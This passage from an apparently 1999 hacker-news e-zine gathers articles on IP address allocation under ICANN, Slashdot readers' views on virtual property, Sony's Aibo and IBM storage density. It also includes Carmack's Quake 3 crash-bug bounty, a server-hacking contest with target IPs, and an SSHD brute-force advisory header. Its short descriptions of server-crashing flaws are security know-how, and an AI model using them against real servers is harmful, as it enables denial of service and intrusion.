     And the perceived scarcity of addresses is just the beginning. As more
     computers connect to the Net, the databases that map the numbers are
     growing larger and becoming unwieldy. The ever-increasing size of the
     network's so-called routing tables has some Net programmers worried.

     "There's going to be a point when machines can't handle the size," said
     Kim Hubbard, president of the American Registry for Internet Numbers,
     which is responsible for allocating and assigning IP addresses in the
     Americas.

     Although there is hope that a new standard, IP version 6 (IPV6), could
     help alleviate both problems, the timeline for a rollout is
     sketchy--estimates range from the next 5 to 25 years. That's why many in
     the Net addressing trenches agree that allocation of these precious
     resources must meet strict guidelines.

     "There is this constant tension about whose interest is being served,"
     said Tony Rutkowski, principal consultant for the Next Generation Internet
     and a founder of the Internet Society. "It's a combination of how these IP
     addresses are allocated and to whom--and that is the rub."

     New nonprofit in the middle

     And now ICANN, which is mediating a number of other contentious debates,
     finds itself in the middle of the long-standing, international struggle
     over who should hold the key to the IP address treasure chest. At a public
     meeting in Berlin later this month, ICANN is expected to take its most
     definitive step on the issue, creating an organization to tackle IP
     addressing.

     Since last November, ICANN has been charged with overseeing the Net's
     technical administration, under a Memorandum Of Understanding it signed
     with the Commerce Department. ICANN also has been recognized by more than
     25 nations in its new role.
     So far, ICANN's challenges posed by IP numbering have been overshadowed by
     other topics, such as authorizing new companies to register domains ending
     in ".com" or adding new top-level domains such as ".web" and ".firm."

     Along with the fact that domains have been a well-publicized issue,
     ICANN's leaders also don't see the IP address issue as terribly pressing.

     "We haven't needed to do anything in the way of [IP address] policy yet,"
     said Michael Roberts, ICANN's interim chief executive. "There is potential
     scarcity. The thing to do is get moving on IPV6, which will deploy in an
     open and fair way based on reasonable need."

     But a failure to adequately tackle a range of problems surrounding IP
     addresses ultimately could cripple the Net. In fact, charting a new IP
     numbering course may prove to be ICANN's most important contribution.

     Chain of command gets longer

     In the past, policy and oversight of IP addresses has been left to the
     Internet Assigned Numbers Authority, the government-funded group that
     designed the numbering system under the leadership of the late Jon Postel.

     Under ICANN, the Internet Assigned Numbers Authority still distributes
     address space to three geographically diverse Regional Internet Registries
     (RIRs), which typically hand out the addresses to large end users such as
     Internet service providers and universities.

     ICANN will be operating under the same bottom-line principles that have
     guided the Internet Assigned Numbers Authority for the past three years.
     They call for a system that conserves addresses and routes Internet
     traffic more efficiently.

     The Internet Assigned Numbers Authority's functions may still be in place,
     but the chain of command is set to be dramatically altered. Whereas the
     buck used to stop at Postel, now it will stop at the ICANN board, which
     ultimately will be advised--and elected--by many representatives in the
     Net community, including regular online users.
     Some veteran Netizens view the shift as necessary, but potentially
     problematic.

     "One of the advantages of [the Internet Assigned Numbers Authority]--and
     one of its disadvantages--is that it rested with a single individual, and
     a single individual could easily make a decision," said Bill Manning, a
     staffer with the University of Southern California's Information Sciences
     Institute, which housed the Internet Assigned Numbers Authority and also
     was headed by Postel. "That nimbleness in being able to respond seems to
     be a necessary casualty in making [the] transition" to a privatized
     Internet.

     In keeping with its mission to turn over Net governance to the private
     sector, ICANN has proposed a model that establishes an address supporting
     organization (ASO), containing stakeholders who will forge new policies
     concerning IP numbering.

     At its Berlin meeting May 26, ICANN will vote on proposed bylaws for
     supporting organizations, including the ASO. The bylaws will set up an
     open membership consisting of IP address registries, ISPs, and end users.
     For a new policy to be enacted a majority of each membership category must
     approve it.

     Election of the new organization comes at a critical juncture in the
     evolution of the Net's address system, experts say, and is almost certain
     to stoke the public scrutiny surrounding ICANN.

     "It's important that [the ASO] understand the technical issues involved
     and are not swayed by the political expediencies that have been pressed in
     the past," said David Conrad, founder of the Asia Pacific Network
     Information Center (APNIC), one of the three IP address registries.

     This sentiment is echoed by ISPs, another faction whose input will be
     vital to the ASO.

     "How this policy recommendation body is formed within ICANN is a concern,"
     said Barbara Dooley, president of ISP trade group the Commercial Internet
     Exchange.

     Numbers don't add up

     Not surprisingly, today's system is a far cry from the way things were
     done in the early days of the Net.
     Thirty years ago few architects of what was then called the Arpanet
     expected it to mushroom into a medium that would change the way people
     live, work, and do business. IP addresses were viewed as an endless
     resource that was free for the taking.

     Out of that thinking came the practice of doling out wastefully large
     blocks of numbers to companies or groups that asked for them. Ford Motor,
     Eli Lilly, and Hewlett-Packard are just three of the holders of the
     largest "legacy" blocks, known as Class A allocations, which contain more
     than 16.7 million addresses each.

     In 1995, leading cable Net access provider @Home appealed to the Internet
     Assigned Numbers Authority after its application for a Class A allocation
     was turned down. @Home ended up getting numerous smaller Class B
     allocations, creating some controversy among local registries.

     The legacy space doled out to those that had the foresight to ask for it
     is the source of jealousy for many latecomers. They point out that while
     Mercedes Benz holds nearly 17 million addresses, only 1.04 million have
     been allocated to the entire nation of China.

     "There are a number of different business issues we foresee in the future
     that will require IP addressing," said Bill Hurley, manager of new media
     and relationship marketing for Mercedes Benz. "We are looking to have an
     IP address for every car."

     ICANN no doubt will be pressured to tip the scales toward those who have
     IP envy.

     "Some people in Africa and South America want their own regional
     registries. Some of the ISPs want to have a bigger role in how the
     allocation is done," acknowledged Commerce Department spokeswoman Becky
     Burr, who is overseeing the agreement with ICANN.

     "There may be a more complicated mix of players," she added. "But it still
     will be a fairly straightforward allocation system."
     Despite pessimism about shortages in IP space and the politics of
     allocation, some legacy holders have voluntarily surrendered their blocks
     for the good of the Net community, such as the Defense Department and
     BBN, now owned by GTE. Stanford University also is in negotiations to
     return part of its huge block, according to school and registry
     officials.

@HWA

37.1 And is webspace infinite?
     ~~~~~~~~~~~~~~~~~~~~~~~~~

     Infinite Space
     From http://www.slashdot.org/
     Posted by JonKatz on Thursday May 13, @10:00AM EDT
     from the Virtual-Property-(cont.) dept.

     Physicists, gamers, Web designers and developers and engineers took up
     (with a vengeance) the question of whether or not the Net and the Web was
     an Infinite Space, forever expansible. Most felt that while Web Space was
     infinite, desirable property isn't. Also comments about crackers,
     cryptography, gaming, virtual property, the future of the Net and the
     Web, and concerns about whether real world property laws apply online.
     All in all, a great cyber gab-fest, pro and con.

     E-mail poured in all weekend about Infinite Space -- whether or not space
     on the Net and Web is forever expansible. This was an offshoot of columns
     and discussions here last week about whether new connective technologies
     like eBay combined with the millions of middle-class Americans pouring
     onto the Web were escalating the concept of virtual property, already a
     custom on some gaming sites.

     On the subject of Infinite Space, I heard from physicists, academics,
     engineers, gamers, computer execs, developers and designers -- some very
     brainy geeks who offered smart and diverging theories. While a majority
     of e-mailers thought virtual property was a big idea whose time had come,
     there were also skeptics claiming this idea wasn't really anything new.
     In one sense, they're right. Gamers have been trading virtual parts,
     symbols and characters for awhile.
     But the impact of new technology is often felt when new and middle-class
     users mainstream it, not when pioneers invent it. Linux isn't new either,
     but that doesn't mean nobody should write or talk about it. As open
     source reaches critical mass, it becomes significant. Same with other
     technologies from the phone to modems to computers themselves. Hackers
     were patching together BBS's from the earliest days of networked
     computing, but it wasn't until many more people, from housewives to
     business owners started pouring online that the Net took off.

     As more and more people -- most armed with credit cards and checkbooks --
     continue to explore and use the Net and the Web, expect continuous and
     unimaginable change. But most of you know that.

     Note: Lots of people wrote asking if I was changing my column format to
     include more of my e-mail responses. Yes, I am. An interactive column
     should, when possible, include more voices than one. Not only do I get
     sick of myself, but I get especially weary of getting so much smart and
     thoughtful e-mail nobody but me ever sees, while the often highly
     testicular public posts on Threads are visible to everybody. Many
     visitors, lurkers and readers confuse Threads with reality. It is one
     reality, but not the only one. People have a perfect right to flame, but
     as my e-mail (and every other Slashdot writer and author demonstrates
     daily) smart lurkers constitute the vast, unseen majority of Slashdot
     readers. They also want to be seen and heard.

     So here are just a few of the posts -- pro and con -- responding to my
     columns about virtual property and my questions about whether space on
     the Net is an Infinite Space:

     Boredom is More Significant, from: Stephane Lajoie

     "Is Net and Web property infinite? That is, is the Net so expansible that
     it could never be overcrowded and congested? If you abstract away things
     like bandwidth and hard-drive storage (which seem to grow fast enough
     anyway), the answer to the first question is yes: the net is infinite.
     But you seem to imply that the second question is the same as the first,
     which it isn't. Crowdedness happens in a specific physical place. We can
     say that New York City is crowded, while Arkansas is close to empty. If
     we extend this concept to the net, you can say that slashdot.org is
     crowded while kgjrhegh.com is empty (the DN isn't even registered,
     anybody could move in there for free; not anybody could move in to
     Microsoft.com though).

     The same thing happens in physical space: if you abstract away things
     like the currently limited means of transportation, you can come to the
     conclusion that living space for humans in the universe is infinite. But
     just like people go to slashdot.org and not to kgjrhegh.com, you won't
     see people moving to Mars en masse even if affordable transportation
     becomes available: there just isn't anything fun to do there.

     I think it is Linus Torvalds who said that in a few decades, the primary
     motivation for people to do "anything" will be fear of boredom. The limit
     here isn't free domain names or available land in an online game. It's
     the attention span of people. People buy powerful characters in UO to get
     attention from other players. Once the game becomes dated and people
     start moving to Everquest, Asheron's Call or others, these characters
     will lose all their value because there won't be anybody to show them off
     to. You can't open a 20 screens megaplex in Nowhere, Arkansas. You can't
     sell web ads at kgjrhegh.com.

     Hope I could keep your attention for that long :).

     PS: The Cyber-Movers example was kinda weak. I mean, it's a bunch of
     engineers copying files around and setting up domain name servers. Hardly
     the signs of a revolution if you ask me :). Still, very interesting
     subject matter.

     PPS: I like this format of writing series of articles instead of moving
     on to a new subject for each article.

     Stéphane Lajoie / Ludus Design

     Nanotechnology and other answers, from Rob Jellinghaus:

     "Is Net and Web property infinite?
     That is, is the Net so expansible that it could never be overcrowded and
     congested?"

     This question is familiar in another domain: nanotechnology. The general
     form of the question is, "Given sufficient technological development, are
     resources potentially inexhaustible? And if so, what happens to the
     economy?"

     In general, it is scarcity that creates value. In a world where there are
     infinite amounts of everything, there is no reason for everything not to
     be free. But when there is only so much of something, then competition
     arises for that scarce resource, and suddenly you need a way to determine
     who needs/wants/deserves it most. Presto: economics.

     Ultima Online could probably, in principle, expand their cyberverse to
     accommodate the influx of people craving land. But it's not clear that
     they should. The scarcity of land there is greatly increasing the value
     of each individual property, perhaps intensifying the fervor of their
     citizens, and certainly buying them advertising that they couldn't buy
     with their own money (your article being a great example). In other
     words, by keeping their virtual real estate scarce, they are more
     effectively competing for the attention of the world's gamers, by making
     it clear just how valuable that real estate is.

     In fact, UO (Ultima Online) perfectly exemplifies the two resources that
     are _not_ infinite, and will never be:

     - Human attention, as all domain name squatters know, is finite. There
       are only so many eyeballs, and only so many hours in a day that those
       eyeballs can be looking at your little corner of the cyberverse. UO is
       competing with Everquest (which is coming up fast). Catchy domain names
       ("slashdot.org") for instance, will always be more valuable than clunky
       ones ("www.mybiglongcompanyname.net").

     - Computing and, especially, network resources are getting exponentially
       cheaper, but as exponentially more people go online, it remains fairly
       costly to serve large audiences.
       UO definitely incurs ongoing costs in hardware, network maintenance,
       and operations management, to keep its servers running; if they were to
       expand their universe infinitely, their costs would also expand
       infinitely.

     Later. Anyway, thanks for the thought-provoking questions,

     Liberating the Lurkers, from Dana Ryder, IMMSystems:

     "Congrats on the new format, if that's what it is. You are liberating the
     Lurkers! Posting comments like you are is the only way some of us can get
     our ideas out and hear the good ideas of others. The rule on Slashdot
     Threads seems to be that the dumber one is, the quicker you are to claim
     you're smarter than everybody else, or that you already knew everything
     everybody else is saying. I can't fault anybody for being stupid, but
     boy, are these people proud of it! Slashdot's columns on Virtual Property
     were talked about all day at my company -- keep 'em coming!"

     Of Course Not, from: Randall L Joiner:

     "To your question about Infinite Space There are several answers:

     Of course not, physical (hardware) resources are limited by definition,
     and thus, eventually will run out.

     Within reason, yes, it's infinite, as tech grows, space keeps getting
     cheaper, there will always be room of some sort.

     The question really is, is valuable web property infinite? Many people
     have already answered that, and from the skim I did, most seem to think
     no. I have to disagree to an extent. Since games and sites only seem to
     hold interest for short time periods (game attention spans often measure
     in hours of game play), and people are constantly searching for the next
     game, I would guess that the interest of the gamers will constantly be
     going through these stages:

     1. New game hits, is relatively unknown.
     2. Some gamers become regulars, game grows to a small number of players.
     3. Game catches on in the main stream, many people start playing.
     4. The original players start tiring of it, (for various reasons) and
        sell out.
     5. Older players go back to stage 1 with some other new game.

     I think we'll start seeing stage 5 in about 6 months to a year with
     Ultima. I give Diablo as an example... Few still play it, because
     everyone's jumped to Ultima. The new up-and coming is EverQuest. It's
     part of the game cycle, only now we have the middle-class coming in
     throwing money around. I want to know what's going to happen when the
     mass evac happens for the next great game, and the fools are stuck with
     characters they've spent loads of $ on, and are now not worth anything,
     and no one is around to play the game with? Even the "rich" couldn't
     keep up for too long, constantly buying new characters for each new game.

     Another problem I don't think you've thought of... What happens if
     there's a network down time? What happens if/when a hard-drive crashes
     and wipes out any record of you having owned the property? If I were the
     company running the hardware those games are running on, I'd make damn
     sure I had a clause stating they aren't responsible for lost
     characters/property/etc...

     Another problem. What happens when (not _if_) someone hacks a game and
     suddenly goes nuts with it? How about Virtual Theft? If I cracked the
     game, steal your house that you just paid 100,000 for, what recourse do
     you have?

     Then there's the difficulty with calling it property... We have a
     bung-hole load of property laws in the states, but do any of them apply
     to cyberspace? How about in a game where killing and taking property is a
     legal action? If I kill your character and taken the property you just
     bought, do you have any legal recourse in RL? No, I really don't consider
     that a silly problem either, as I've read some of the things people have
     gone to court over (and won!) that are much much more silly.

     Altogether, I'm just completely amused by the concept, and consider this
     just one more proof that most people really don't understand what the
     world or the net is really about."

     Please!
     Absolutely Nothing New Here, from: thom stuart (painfully):

     Much as it pains me every single time I realize it, I'm afraid that I
     have to report that once again you're picking value out of vapor and
     getting all excited about something that, as always, isn't exciting or
     new at all. I'm tempted to launch into an extensive diatribe, but I've
     got work to do today. Suffice it to say that the "virtual property"
     that's got you so frantic in the last couple days is nothing more than a
     sale of service. It's amazing that you're managing to misunderstand this
     to the extent where you think there's something new.

     Every month I buy a package of 'minutes' for my mobile phone from my
     wireless company. These are just numbers in a computer, of course - am I
     purchasing "virtual property" here? And, if I am, haven't people been
     doing that for years? I could subscribe to a paying-members-only web
     site; I could choose to pay for HBO; I could buy an Ultima Online account
     or good domain name from ebay. These are all the same thing - I'm buying
     the right to use a service. Just because I'm not getting a physical
     product in return doesn't make it magic or 'cyber' or anything else you
     might want to think.

     Okay, the UO accounts and domain names might have certain 'added value'
     in terms of the time/effort invested in bringing them to their current
     status, but that doesn't make it any different. By buying an account or a
     domain, the purchaser is simply entitled to access to certain kinds of
     service in return for their cold hard cash - but hey, who pays in
     "physical cash" these days, anyway? Ooh! ooh! virtual property paid for
     with "virtual money"! another monumental technological discovery from jon
     katz! better write another /. column about this! please.

     Crackers, Gaming and Infinite Space (anonymous):

     Here's a copy of the comment I just posted... thought you might like
     it... BTW great set of articles, and I find your style to finally have
     settled out into something that doesn't seem megalomaniacal and much more
     suited to the world you've stepped into.. I've liked about 75% of your
     articles, those I didn't like were some of the earlier ones:

     It's bad enough that hackers are being berated by main stream media for
     supposedly "stealing" from large, anonymous corporations, can we all see
     what will happen when the middle class has a vested interest in computer
     security? What were to happen if a cracker got onto one of the Ultima
     online servers, helped himself to some UO Cash and then bought himself
     whatever he needs? Worse yet: Cracker gets onto the server, figures out
     some of its data structure, and decides to get into another player's
     building and cleans him out? Crackers/malicious hackers finally have
     something that has value to steal and they would be stealing from
     mainstream america instead of the corps.

     This can have several consequences as I see it:

     First and foremost: The biggest hacker backlash in history. You think the
     Kevin Mitnick case was bad... now the law enforcement officials no longer
     have to work on the "estimated losses" reported by companies when they
     get documents copied off their servers (say source code), they have real
     world price tags on what the damages were. Moreover, can we really trust
     mainstream american media to see the difference between hackers and
     crackers? It's bad enough that they can't do it now when the crackers are
     just defacing websites.

     Secondly: With a bit of luck, this will drive all aspects of computer
     security forward. I can see dedicated players paying good dollars for
     crypto systems that would protect their online assets. As well,
     Internationalization of crypto technology will be given a big boost as
     non-North american players will want access to the same quality of crypto
     as we are privileged to have.
     Thirdly: Government regulation will quickly be pushed onto the scene. Any
     location generating real US$ seems to become the target of the US house
     and senate.

     Third, B: TAXATION! As is, it's very difficult to keep the internet taxes
     at bay. In the states, the problem seems to stem from the separation of
     states.. but if people start shelling out cash for virtual property, the
     likes of which cannot be seen right now, there will be a renewed effort
     by the USG to tax online transactions.

     Fourth: Hopefully this will lead to the apparition of "free" servers that
     will pop up and have much more room to grow, allowing people to settle
     in. It'd be even nicer if a "Homesteading" act were to be implemented on
     UO (specific example) to move over onto the new systems, giving them some
     sort of bonuses (very much like the development of the "Wild West in
     early America.)

     From Craig Wright: Interesting, But Shame On You!

     Virtual Property is an interesting issue but really is nothing new.
     Buying "space" from an isp for a large website has been around for years,
     paying someone else to build the website is commonplace, digitizing a
     photograph, and how about DOMAIN NAMES? - these are all forms of virtual
     property. Middle class americans have been paying cash for ownership of
     virtual materials for some time now. Focusing on some geeks who spend too
     much on UO characters on ebay and then implying from that fact the
     economy is undergoing a fundamental change is really quite silly. Put
     your technophile cheerleader pom poms down and do a little research
     willyah?

     Within the online gaming community there are other useful examples of
     virtual property such as Chron-X, Sanctum and other budding online games
     working on a far different paradigm than the "service" model of the
     "pay-as-you-play" games such as UO. C-X and Sanctum are wholly or
     partially based around the collectable card game paradigm introduced
     years ago by MAGIC: THE GATHERING.
The interesting thing about the online versions (which have been around for at least three years or so) is that they are ENTIRELY virtual property, unlike UO-type games where you have to buy the software and pay an ongoing service fee to keep playing. In these other games the only thing that one pays for is the virtual cards (software free, no fees except paying for more cards should you want them). As one might expect, trading, auctioning, and selling collections has been an integral part of the development of these games. I believe C-X at one time had over 70k accounts and may have plenty more now that they have moved to a Sony gaming site (I haven't played for nearly a year). As a matter of fact, Genetic Anomalies, the company behind Chron-X, began as a company devising a method for protecting virtual property, developed what they call Collectible Bits (back in 1996 I believe), and designed the game primarily as a way to illustrate what their software product could do in terms of reducing stealing and hacking problems already the cause of so many problems in various online gaming communities.

UO tangent: it is neither the first, best nor probably even the largest of its genre. The 150k players - that's BS; online games inflate their players by counting ACCOUNTS rather than active players. Many players play for a while and then either reduce their playing time significantly or stop playing altogether - but their ACCOUNTS are still counted. This is especially problematic with UO as there are a half dozen or so games all currently in stiff competition for the same audience. By the way, UO is the only one of its genre in which its participants have attempted to bring a class action suit against the company because of their dissatisfaction with the game. The whole genre is unlikely to become a dominant faction within the online gaming community merely because it is so damn expensive to play.
There have been dozens of experiments for specific subscription games or subscription gaming sites of several varieties, and none have achieved more than moderate success.

I read a few of the /. comments on your first piece and ran across thoughtful responses that disagreed with you which also made interesting points -- yet in your article you quote a few imbecilic flames as representative of those who disagree and more thoughtful responses of those who agree. This is a rather cheap way to make your argument appear stronger - shame on you!

(Note: I only quote from e-mail, since thoughtful (and non-thoughtful) disagreements are posted openly on Threads. And I didn't get many disagreements last week. I always reflect an accurate balance of criticism versus agreement -- discussions where everybody agrees are sort of pointless, and, on the Net, impossible. As for nasty flames, they never bother me a bit -- kind of like mosquitoes or peas off a tank. Knowledgeable or thoughtful criticism, on the other hand, terrifies me.)

@HWA

38.0 Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sony's robotic dog: cute, but not cuddly
By Stephanie Miles
Staff Writer, CNET News.com
May 11, 1999, 1:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,36375,00.html

Could Sony's new Aibo be a robotic--and canine--version of a Trojan horse, this time used to smuggle the electronic giant's new technology into homes around the world?

Probably not, analysts say, but Aibo will bring robotics into the home, along with other new Sony technologies.

Announced today, Aibo is an electronic pet capable of acting in response to external stimuli and communicating with its owner. Intended for entertainment purposes only, the introduction of the robotic dog contains shades of the company's previous entertainment product, the PlayStation.
Once introduced as a pure gaming platform, the PlayStation now includes computing components such as DVD drives and Internet access.

The introduction of the electronic pet is probably not a subversive method of ingratiating Sony technology into the American home, especially because Aibo is only projected to sell 2,000 units in the United States next year, according to Sean Kaldor, an analyst with International Data Corporation.

"I don't think this is their vehicle to propagate technologies into the mass user scale," Kaldor said, noting that Aibo can only perform very limited functions and can't even fetch yet. Plus, he noted, the toy is priced around $2,000, which will probably discourage mainstream acceptance. "This isn't a stealth way to mass-introduce a product."

But Aibo may be some Americans' first opportunity to play with Sony's Memory Stick, a portable, re-recordable storage medium 1.5 inches long with the thickness of a piece of gum. Sony is selling an 8MB Memory Stick accessory that can store commands for Aibo.

Aibo is also one of the first shipping devices running on Sony's Aperios real-time embedded operating system. Sony struck a deal with General Instrument last year, licensing the operating system for use in GI's set-top boxes.

"There's a lot of operating systems out there, and this is Sony's proprietary operating system," explained Seamus McAteer, an analyst with Jupiter Communications, expressing doubts that Sony is making any significant attempt at marketing or promoting Aperios through Aibo. "You're not going to have a ton of developers developing a lot of applications to run on this device, so it doesn't buy you a whole lot," he said. "Whoever's going to buy this really doesn't care which real-time OS it is using. It's a design win, but not a big deal."
Americans are not likely to shell out $2,000 for a programmable dog that does not yet fetch, but Aibo is likely to succeed in the Japanese market, which wholeheartedly embraced the Tamagotchi electronic toys, Kaldor said. "The Japanese perspective on technology is warm and fuzzy," he said. "Robots in Japan are seen as very compelling things, unlike in the U.S., where they seem cold and harsh."

@HWA

39.0 IBM Breaks more records for higher density storage in hard disk units
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wednesday May 12 4:02 AM ET
IBM Researchers Claim New Data Storage Record

SAN JOSE, Calif. (Reuters) - International Business Machines Corp. (NYSE: IBM) said it plans to announce Wednesday that its researchers have set a new world record for high density data storage.

The company said it has doubled its old record by packing data so tight that 20.3 billion bits can fit in a square inch of data storage -- pushing up against what many analysts believe to be the physical limits of such technology.

At the new level of density, every square inch of disk space could hold 2.5 billion bytes -- equivalent to two TV-quality movies or the text of some 2,500 average-sized novels. Eight bits equal a byte. A byte can store about one character of text.

The new disk drives are 3.5 times more dense than IBM's highest capacity product, a disk drive for portable computers capable of storing nearly 6 billion bits per inch of data.

The new developments have been demonstrated only in IBM's research labs, the company noted. It could take two to three years before IBM is ready to incorporate the technology into commercial products from IBM, or in disk drives that IBM's technology manufacturing unit increasingly builds for other computer makers, it said.

``This laboratory demonstration is very good news for our customers and the data storage industry,'' said Robert Scranton, director of recording head technology at IBM's Almaden Research Center.
``It shows that disk-drive capacities will continue to increase well into the 21st Century,'' he said.

The greater storage capacity could be used to boost the capabilities of portable electronics that use IBM's tiny 1-inch microdrive data storage disks or laptops using its 2.5-inch drives, the company said. The extra capacity can be used to store recorded music or data-intensive graphics or video that would be impractical using current technology. In addition, large corporations could use such ultra-high-capacity drives to store far more data in storage systems using the same floor space.

``The stability of the bits was especially encouraging,'' Scranton added, referring to possible fluctuations in storage media used in such systems when pushed to such extremes. ``To make smaller bits, we improve both the disk materials and the read-write components to ensure that the bits' magnetic orientations will not change by themselves, yet the user can still quickly and reliably erase and rewrite bits,'' he said.

IBM, which is headquartered in Armonk, N.Y., invented computer hard disk technology in the 1950s and continues to be a leader in advancing the storage capacity of computers. The first technical details of the new storage system will be disclosed next week at the International Magnetics Conference (Intermag 99) in Kyongju, Korea.

@HWA

40.0 Carmack offers a bounty on Quake server DoS's and bug reports
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

F I N G E R

This finger is being tracked and served by The Stomping Grounds' Finger Tracker. If you are looking for more fingers, please visit Stomped or go directly to the Stomped Finger Tracker.
[idsoftware.com]
Name: John Carmack
Email: johnc@idsoftware.com
Description: Programmer
Project: Quake 3 Arena
-------------------------------------------------------------------------------
5/11/99
-------
You can bias the level of detail lower than allowed in the menu with "r_lodbias 2", which will force all models to the lowest lod. The view weapon will look very ugly.

Another little speedup option that isn't offered in the menus is "cg_simpleitems 1"; this removes the extra rings and spheres around some items.

You can also turn off all the gibs with "cg_gibs 0".

* clear game memory at init, which fixes the stuck-at-intermission problem on mac servers
* fixed mismatched free / Z_Free in demo menu
* removed unused reference to sprites/plama.md3
* automatically get sounds from model name
* scale sensitivity by zoom
* immediately archive changes to latched cvars
* cheat protect r_portalonly
* don't print "XXX connected" on level restarts
* fixed "give item" on levels where 0,0,0 is in solid
* fixed timedemo
* don't play pain falling sound if dead
* fixed falling damage sound not snd specific
* fixed crashtest 2
* fixed crashtest 1
* q3map_backshader
* q3map_globaltexture

5/11/99
-------
Do NOT send bug reports and game comments directly to me! If I have to filter through hundreds of emails a day, I won't get any more work done... Only crashtest related problems should come to me, everything else should go to q3feedback@idsoftware.com.

5/11/99
-------
Sami Tammilehto wins the second prize. Some large connectionless packets can cause crashes. This one was a result of me having the maximum token size defined lower than the maximum string size.

5/11/99
-------
BigImp wins the first prize. It doesn't crash the server, but fmtspec names will crash all clients that try to log on. Technically that would be an upkeep required DOS attack, but I'll let this one go. I even had a "FIXME: make vsprintf safe" comment by the offending line...
I am going to update the server to filter out all % chars that come in over the net to prevent any other similar things.

5/11/99
-------
Everyone should realize that many popular net links are going to be clogged up with q3test downloads for a while, so net play may be a bit patchy to a lot of servers.

-------------

Now that the first win32 test is out, here is The Plan for going forward:

All future releases should be same-day for all architectures.

There may be an exe-only update to the current distributions if there are significant problems, but it isn't scheduled.

The next major test release will include a new one on one map designed for tournament play, and new executables with server and game modifications, but will not require downloading a new pak0.pk3.

The release after that will introduce various teamplay rules on the original two maps. This version will likely be another full download, because I know that I still have a couple things to change in the map format. This will probably be the first test running with the virtual machine.

The final major test release will introduce the single player game with bots and ranks. After any bugs are shaken out of that, it will be the "Q3 Demo" instead of the "Q3 Test", and we should be ready to release the full game to stores.

In an ideal world, people that aren't prepared to deal with in-development software would wait until then to form an opinion of the product.

---------------

***** I am offering a bounty for server crashing bugs.

Q2 had several releases forced out because of malicious attacks on all the public servers, so I want to try and flush out what I can during Q3's testing phase.

There is a server running in the debugger here at crashtest.idsoftware.com (192.246.40.68). Anyone that can repeatably hang or crash this system can have a $100 prize and some misc bit of Q3A paraphernalia that I can dig up.
Operating system level attacks don't count -- only things that I can actually fix or protect against in my code.

Denial of service attacks don't count if they require upkeep, but if there is a fire-and-forget DOS attack, it will still count.

Any actions you can perform with the released client are fair game. Crashing the client isn't good for a bounty, but I would still like to know about it.

Custom attack programs are also fair game. These are actually what I am most concerned about -- malicious programs that go through and crash all listed servers.

Ideally, you would practice on a private server under your control and only hit crashtest when you think you can repeat it.

If you find one, email me the instructions so I can reproduce it. Include "CRASHTEST" in the subject so I won't miss it. First come, first served, one bounty per bug.

I will update crashtest with our internal builds, so it will certainly be possible that an attack on the released servers no longer functions on crashtest.

@HWA

41.0 Hack into a webserver and win $10,000 ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Break Into a Web Server win $10,000
contributed by szone

You can win a measly $10,000 for penetration into web servers during tomorrow's Hackers Zone competition organized in conjunction with Infosecurity Asia. This 'competition' of course is nothing more than an exploitation by the sponsors Conclave and Voltaire whose products will be 'tested'. The IP addresses of the boxes in question are 210.24.153.90 and 210.24.153.70. You need not be present to win.

(I don't know about you but I have better things to do with my time than be advertising fodder for these companies. If they want a real world security assessment of their products let them pay for one.)
Internet Wire
http://www.internetwire.com/technews/tn/tn982682.htx

Tech Web
http://www.techweb.com/printableArticle?doc_id=TWB19990512S0029

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html

Nando Times
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html

Asian Conference Hosts Hacking Contest
By Malcolm Maclachlan, TechWeb
May 12, 1999 (4:28 PM)
URL: http://www.techweb.com/wire/story/TWB19990512S0029

A conference in Singapore is working to show the dangers of hacking, ironically, by holding a hacking contest with thousands of dollars in prizes.

The international Hackers Zone competition, which started Wednesday, is offering $10,000 to the first person to successfully break into servers connected to the Web and running security products. One server is running security products from Voltaire Advanced Data Security, while the second server is running software from Conclave Integrated Security.

The contest, hosted by Infosecurity Asia '99, the computer-security conference that will be held in Singapore next month, is open to anyone in the world. In order to prove success, hackers have to move a file onto the server, or modify the Web page hosted there, and then send an e-mail describing their action to an address set up at Yahoo. The conference has promised to keep the names of all contestants confidential.

The sponsors of the contest sought to point out that they did not endorse hacking, the general term for breaking into computer networks. Some computer enthusiasts prefer the term "cracker," using the term hacker instead to refer to any hard-core programmer.

"We consider hacking a criminal offense prosecutable in many countries and we do not condone such actions," said George Kane, regional director of Conclave, in a statement.

Dan Farmer, a well-known computer-security expert, said such contests are not what they're cracked up to be.

"Organizations do this from time to time -- it's not unusual," Farmer said. "I view them as misguided and modestly dangerous publicity stunts."

There are a number of problems with such contests, he said. For one thing, the computer set-ups rarely mimic the way a network would be forced to work in the real world. Thus, he said, some companies use such contests to tout the invincibility of their systems and say how they foiled the world's best crackers, even though the world's best hackers probably would not get involved in something like this.

Companies also get free testing of their systems. For instance, they can get "attack signatures," digital fingerprints that show how people attack a certain system. These can be used later to help companies realize when they are being attacked in the future. Such signatures are hard to get in the real world. Furthermore, such security testing can be quite expensive.

"10K is chump change in the corporate world," Farmer said.

Farmer is the author of Security Administrator's Tool for Analyzing Networks, a Unix tool that systems administrators use to test for security breaches in networks. The program, known as SATAN, caused a stir when it came out in 1995, prompting Farmer to publish multiple documents through his website explaining the rationale behind the software.

The difference, Farmer said, is that contests encourage a certain type of behavior.

"They're sending a message that breaking into systems is OK, that they'll reward the best and brightest," Farmer said.

@HWA

42.0 SSHD vulnerability discovered by JJF Hackers Team
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

SSH Hole
contributed by Zhodiac

The J.J.F. Hackers Team has released an advisory that covers problems in SSHD2 (up to version 2.0.11). The vulnerability describes a way to brute force a login/password.

J.J.F. Hackers Team
http://www.jjf.org/advisory/SshdJJFen.txt

- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 05/09/1999
Release: 05/14/1999
Author: Zhodiac
URL: http://www.jjf.org
